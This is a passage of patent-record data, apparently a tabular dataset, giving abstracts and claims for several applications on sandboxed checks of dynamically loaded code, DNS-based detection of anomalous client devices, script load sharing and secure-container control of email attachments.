executing, via at least one of one or more computing devices, an application in a sandboxed environment; determining, via at least one of the one or more computing devices, that the application is attempting to access dynamically loaded code; and modifying, via at least one of the one or more computing devices, a portion of the dynamically loaded code to repair a detected security risk of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 8. The method of claim 7, wherein the one or more computing devices comprises a client device. 9. The method of claim 8, further comprising:
routing, via the client device, the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 10. The method of claim 8, further comprising:
routing, via the client device, a uniform resource locator (URL) corresponding to the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 11. The method of claim 7, further comprising performing, via at least one of the one or more computing devices, a security evaluation of the dynamically loaded code, the detected security risk being detected as a result of the security evaluation. 12. The method of claim 11, wherein the security evaluation is based at least in part on a prior security evaluation of the dynamically loaded code. 13. The method of claim 7, wherein the application is being offered for at least one of download or sale via an application marketplace, and an offering of the application via the application marketplace includes a flag indicating a potential security risk. 14. The method of claim 7, further comprising identifying the security risk based at least in part on at least one of: a version of the dynamically loaded code or a source of the dynamically loaded code. 15. A system, comprising:
a client device; and a first application executable by the client device, wherein, when executed, the first application causes the client device to at least:
execute a second application;
determine that the second application accesses dynamically loaded code;
determine a security risk associated with the dynamically loaded code in response to an evaluation of the dynamically loaded code; and
reduce the security risk by modifying a portion of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 16. The system of claim 15, wherein the second application is executed in a sandboxed environment. 17. The system of claim 16, wherein the sandboxed environment comprises an emulator of the client device. 18. The system of claim 16, wherein the sandboxed environment comprises a prevention layer configured to prevent access by the second application to resources of the client device. 19. The system of claim 15, wherein determining the security risk further comprises:
transmitting the dynamically loaded code to a computing device over a network, the evaluation being performed by the computing device; and receiving an indication of the security risk from the computing device. 20. The system of claim 15, wherein determining that the second application accesses the dynamically loaded code further comprises:
determining that the second application attempts to contact an external network site without using a required application programming interface (API) call. | Disclosed are various embodiments for performing security verifications for dynamic applications. An application is executed and it is determined that the application requests access to dynamically loaded code. In response to determining a security risk associated with the dynamically loaded code, a portion of the dynamically loaded code is modified to eliminate the security risk.1. A system, comprising:
at least one computing device; and at least one application executable by the at least one computing device, wherein, when executed, the at least one application causes the at least one computing device to at least:
execute an instance of an application in a sandboxed environment;
determine that the instance of the application is requesting access to dynamically loaded code;
determine a security risk associated with the dynamically loaded code; and
modify a portion of the dynamically loaded code to eliminate the security risk, a remaining portion of the dynamically loaded code being unmodified. 2. The system of claim 1, wherein modifying a portion of the dynamically loaded code comprises repairing the portion of the dynamically loaded code. 3. The system of claim 1, wherein modifying the portion of the dynamically loaded code comprises replacing the portion of the dynamically loaded code with another portion of code. 4. The system of claim 1, wherein the application is one of a plurality of applications being offered for at least one of download or sale via an application marketplace. 5. The system of claim 1, wherein the security risk is determined based at least in part on at least one of: a version of the dynamically loaded code, a signature of the dynamically loaded code, a source of the dynamically loaded code, a previous security evaluation, a code inspection of the dynamically loaded code. 6. The system of claim 1, wherein determining that the application requests accesses the dynamically loaded code further comprises detecting of at least one of: a download of data to executable code memory of the at least one computing device or previously downloaded data including recognizable executable code. 7. A method, comprising:
executing, via at least one of one or more computing devices, an application in a sandboxed environment; determining, via at least one of the one or more computing devices, that the application is attempting to access dynamically loaded code; and modifying, via at least one of the one or more computing devices, a portion of the dynamically loaded code to repair a detected security risk of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 8. The method of claim 7, wherein the one or more computing devices comprises a client device. 9. The method of claim 8, further comprising:
routing, via the client device, the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 10. The method of claim 8, further comprising:
routing, via the client device, a uniform resource locator (URL) corresponding to the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 11. The method of claim 7, further comprising performing, via at least one of the one or more computing devices, a security evaluation of the dynamically loaded code, the detected security risk being detected as a result of the security evaluation. 12. The method of claim 11, wherein the security evaluation is based at least in part on a prior security evaluation of the dynamically loaded code. 13. The method of claim 7, wherein the application is being offered for at least one of download or sale via an application marketplace, and an offering of the application via the application marketplace includes a flag indicating a potential security risk. 14. The method of claim 7, further comprising identifying the security risk based at least in part on at least one of: a version of the dynamically loaded code or a source of the dynamically loaded code. 15. A system, comprising:
a client device; and a first application executable by the client device, wherein, when executed, the first application causes the client device to at least:
execute a second application;
determine that the second application accesses dynamically loaded code;
determine a security risk associated with the dynamically loaded code in response to an evaluation of the dynamically loaded code; and
reduce the security risk by modifying a portion of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 16. The system of claim 15, wherein the second application is executed in a sandboxed environment. 17. The system of claim 16, wherein the sandboxed environment comprises an emulator of the client device. 18. The system of claim 16, wherein the sandboxed environment comprises a prevention layer configured to prevent access by the second application to resources of the client device. 19. The system of claim 15, wherein determining the security risk further comprises:
transmitting the dynamically loaded code to a computing device over a network, the evaluation being performed by the computing device; and receiving an indication of the security risk from the computing device. 20. The system of claim 15, wherein determining that the second application accesses the dynamically loaded code further comprises:
determining that the second application attempts to contact an external network site without using a required application programming interface (API) call. | 2,400 |
9,149 | 9,149 | 15,256,418 | 2,439 | This specification generally relates to methods and systems for applying network policies to devices based on their current access network. One example method includes identifying a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with the computer identified by the hostname on behalf of the client device; determining an identity of the client device based on the proxy connection request; identifying a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request; and updating DNS usage information for the particular client based on the identified DNS response including the hostname from the proxy connection request. | 1. A computer-implemented method executed by one or more processors, the method comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 2. The method of claim 1, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 3. The method of claim 1, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 4. The method of claim 1, wherein the hostname is included in a Uniform Resource Locator (URL). 5. The method of claim 1, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 6. The method of claim 1, further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 7. The method of claim 6, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 8. A non-transitory, computer-readable medium storing instructions operable when executed to cause at least one processor to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 9. The non-transitory, computer-readable medium of claim 8, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 10. The non-transitory, computer-readable medium of claim 9, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 11. The non-transitory, computer-readable medium of claim 8, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 12. The non-transitory, computer-readable medium of claim 8, wherein the hostname is included in a Uniform Resource Locator (URL). 13. The non-transitory, computer-readable medium of claim 8, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 14. The non-transitory, computer-readable medium of claim 8, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 15. A system comprising:
memory for storing data; and one or more processors operable to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network;
identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network;
determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and
in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 16. The system of claim 15, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 17. The system of claim 16, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 18. The system of claim 15, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 19. The system of claim 15, wherein the hostname is included in a Uniform Resource Locator (URL). 20. The system of claim 15, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. | This specification generally relates to methods and systems for applying network policies to devices based on their current access network. One example method includes identifying a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with the computer identified by the hostname on behalf of the client device; determining an identity of the client device based on the proxy connection request; identifying a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request; and updating DNS usage information for the particular client based on the identified DNS response including the hostname from the proxy connection request.1. A computer-implemented method executed by one or more processors, the method comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 2. The method of claim 1, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 3. The method of claim 1, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 4. The method of claim 1, wherein the hostname is included in a Uniform Resource Locator (URL). 5. The method of claim 1, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 6. The method of claim 1, further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 7. The method of claim 6, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 8. A non-transitory, computer-readable medium storing instructions operable when executed to cause at least one processor to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 9. The non-transitory, computer-readable medium of claim 8, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 10. The non-transitory, computer-readable medium of claim 9, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 11. The non-transitory, computer-readable medium of claim 8, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 12. The non-transitory, computer-readable medium of claim 8, wherein the hostname is included in a Uniform Resource Locator (URL). 13. The non-transitory, computer-readable medium of claim 8, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 14. The non-transitory, computer-readable medium of claim 8, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 15. A system comprising:
memory for storing data; and one or more processors operable to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network;
identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network;
determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and
in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 16. The system of claim 15, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 17. The system of claim 16, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 18. The system of claim 15, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 19. The system of claim 15, wherein the hostname is included in a Uniform Resource Locator (URL). 20. The system of claim 15, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. | 2,400 |
9,150 | 9,150 | 15,603,847 | 2,458 | Methods, devices and program products are provided for utilizing one or more processors to receive a request from a client device for a network responsive resource. The network responsive resource includes a substitute scripted component. The methods, devices and program products determine whether to implement load sharing based on utilization information indicative of a load and build the network responsive resource with a client-side scripted component as the substitute scripted component. | 1. A method, comprising:
utilizing one or more processors to perform the following: receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 2. The method of claim 1, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 3. The method of claim 2, wherein the server-side scripted component represents a PHP scripted component executable by the resource manager. 4. The method of claim 1, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 5. The method of claim 1, wherein the client-side scripted component represents a Java scripted component executable by a browser at a client device. 6. The method of claim 1, wherein the utilization information is indicative of the load experienced by a resource manager. 7. The method of claim 1, wherein the utilization information is indicative of the load experienced by a client device, the determining including determining to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 8. The method of claim 1, further comprising returning the network responsive resource to a client device; executing, at a browser of the client device, the client-side scripted component; and displaying the responsive resource with the browser of the client device. 9. A device, comprising:
one or more processors; memory storing instructions accessible by the processor; wherein, responsive to execution of the instructions, the one or more processors to: receive a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determine whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, build the network responsive resource with a client-side scripted component as the substitute scripted component. 10. The device of claim 9, wherein, responsive to execution of the instructions, the one or more processors to build the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 11. The device of claim 9, wherein the device comprises a server and wherein the server-side scripted component represents a PHP scripted component executed by the server. 12. The device of claim 9, wherein the memory stores the network responsive resource with a server-side scripted component as the substitute scripted component, and wherein, responsive to execution of the instructions, the one or more processors to substitute the client-side scripted component for the server-side scripted component. 13. The device of claim 9, wherein the utilization information is indicative of the load experienced by a resource manager. 14. The device of claim 9, wherein the utilization information is indicative of the load experienced by a client device, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 15. The device of claim 9, wherein the utilization information is indicative of loads experienced by a client device and a resource manager, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on a relation between the loads experienced by the client device and the resource manager and corresponding device and manager load thresholds. 16. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 17. The computer program product of claim 16, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 18. The computer program product of claim 16, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 19. The computer program product of claim 16, further comprising comparing the utilization information to a threshold and based on the comparing disabling an auto activation component within the network responsive resource. 20. The computer program product of claim 19, further comprising, based on the comparing, adding an activation query to the network responsive resource, the activation query to be presented in a display as an option to allow a user to activate the disabled auto activation component. | Methods, devices and program products are provided for utilizing one or more processors to receive a request from a client device for a network responsive resource. The network responsive resource includes a substitute scripted component. The methods, devices and program products determine whether to implement load sharing based on utilization information indicative of a load and build the network responsive resource with a client-side scripted component as the substitute scripted component.1. A method, comprising:
utilizing one or more processors to perform the following: receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 2. The method of claim 1, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 3. The method of claim 2, wherein the server-side scripted component represents a PHP scripted component executable by the resource manager. 4. The method of claim 1, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 5. The method of claim 1, wherein the client-side scripted component represents a Java scripted component executable by a browser at a client device. 6. The method of claim 1, wherein the utilization information is indicative of the load experienced by a resource manager. 7. The method of claim 1, wherein the utilization information is indicative of the load experienced by a client device, the determining including determining to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 8. The method of claim 1, further comprising returning the network responsive resource to a client device; executing, at a browser of the client device, the client-side scripted component; and displaying the responsive resource with the browser of the client device. 9. A device, comprising:
one or more processors; memory storing instructions accessible by the processor; wherein, responsive to execution of the instructions, the one or more processors to: receive a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determine whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, build the network responsive resource with a client-side scripted component as the substitute scripted component. 10. The device of claim 9, wherein, responsive to execution of the instructions, the one or more processors to build the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 11. The device of claim 9, wherein the device comprises a server and wherein the server-side scripted component represents a PHP scripted component executed by the server. 12. The device of claim 9, wherein the memory stores the network responsive resource with a server-side scripted component as the substitute scripted component, and wherein, responsive to execution of the instructions, the one or more processors to substitute the client-side scripted component for the server-side scripted component. 13. The device of claim 9, wherein the utilization information is indicative of the load experienced by a resource manager. 14. The device of claim 9, wherein the utilization information is indicative of the load experienced by a client device, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 15. The device of claim 9, wherein the utilization information is indicative of loads experienced by a client device and a resource manager, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on a relation between the loads experienced by the client device and the resource manager and corresponding device and manager load thresholds. 16. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 17. The computer program product of claim 16, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 18. The computer program product of claim 16, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 19. The computer program product of claim 16, further comprising comparing the utilization information to a threshold and based on the comparing disabling an auto activation component within the network responsive resource. 20. The computer program product of claim 19, further comprising, based on the comparing, adding an activation query to the network responsive resource, the activation query to be presented in a display as an option to allow a user to activate the disabled auto activation component. | 2,400 |
9,151 | 9,151 | 15,846,675 | 2,457 | Various examples for remotely controlling access to email resources are provided. In one example, one or more computing devices can be configured to provide, through an access control service, at least one user interface that enables creation of resource rules configured for use by the access control service in enforcement of one or more client devices in association with email resources. In response to input received through the at least one user interface of the access control service, the one or more computing devices can generate a resource rule that directs a client application on a client device to open an attachment of one of the email resources in an authorized secure container application. | 1. A system for remotely controlling access to an email resource, comprising:
at least one computing device comprising at least one hardware processor; and program instructions stored in memory that, when executed by the at least one hardware processor, direct the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources;
in response to input received through the at least one user interface, generate the at least one resource rule on the at least computing device; and
direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 2. The system of claim 1, further comprising program instructions that, when executed, direct the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 3. The system of claim 2, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 4. The system of claim 2, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 5. The system of claim 1, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 6. The system of claim 1, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 7. The system of claim 1, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 8. A non-transitory computer-readable medium for remotely controlling access to an email resource embodying program code executable by at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; in response to input received through the at least one user interface, generate the at least one resource rule on the at least computing device; and direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 9. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 10. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 11. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 12. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 13. The non-transitory computer-readable medium of claim 8, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 14. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 15. A method for remotely controlling access to an email resource comprising:
providing, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; generating, in response to input received through the at least one user interface, the at least one resource rule on the at least computing device; and directing, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 16. The method of claim 15, further comprising, in response to the at least one resource rule being generated, modifying the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 17. The method of claim 16, wherein the one of the plurality of email resources is modified by:
removing a first portion of the one of the plurality of email resources prior to encryption; and encrypting a second portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 18. The method of claim 15, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 19. The method of claim 15, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 20. The method of claim 15, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. | Various examples for remotely controlling access to email resources are provided. In one example, one or more computing devices can be configured to provide, through an access control service, at least one user interface that enables creation of resource rules configured for use by the access control service in enforcement of one or more client devices in association with email resources. In response to input received through the at least one user interface of the access control service, the one or more computing devices can generate a resource rule that directs a client application on a client device to open an attachment of one of the email resources in an authorized secure container application.1. A system for remotely controlling access to an email resource, comprising:
at least one computing device comprising at least one hardware processor; and program instructions stored in memory that, when executed by the at least one hardware processor, direct the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources;
in response to input received through the at least one user interface, generate the at least one resource rule on the at least computing device; and
direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 2. The system of claim 1, further comprising program instructions that, when executed, direct the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 3. The system of claim 2, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 4. The system of claim 2, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 5. The system of claim 1, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 6. The system of claim 1, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 7. The system of claim 1, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 8. A non-transitory computer-readable medium for remotely controlling access to an email resource embodying program code executable by at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; in response to input received through the at least one user interface, generate the at least one resource rule on the at least computing device; and direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 9. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 10. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 11. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 12. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 13. The non-transitory computer-readable medium of claim 8, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 14. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 15. A method for remotely controlling access to an email resource comprising:
providing, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; generating, in response to input received through the at least one user interface, the at least one resource rule on the at least computing device; and directing, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 16. The method of claim 15, further comprising, in response to the at least one resource rule being generated, modifying the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 17. The method of claim 16, wherein the one of the plurality of email resources is modified by:
removing a first portion of the one of the plurality of email resources prior to encryption; and encrypting a second portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 18. The method of claim 15, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 19. The method of claim 15, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 20. The method of claim 15, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. | 2,400 |
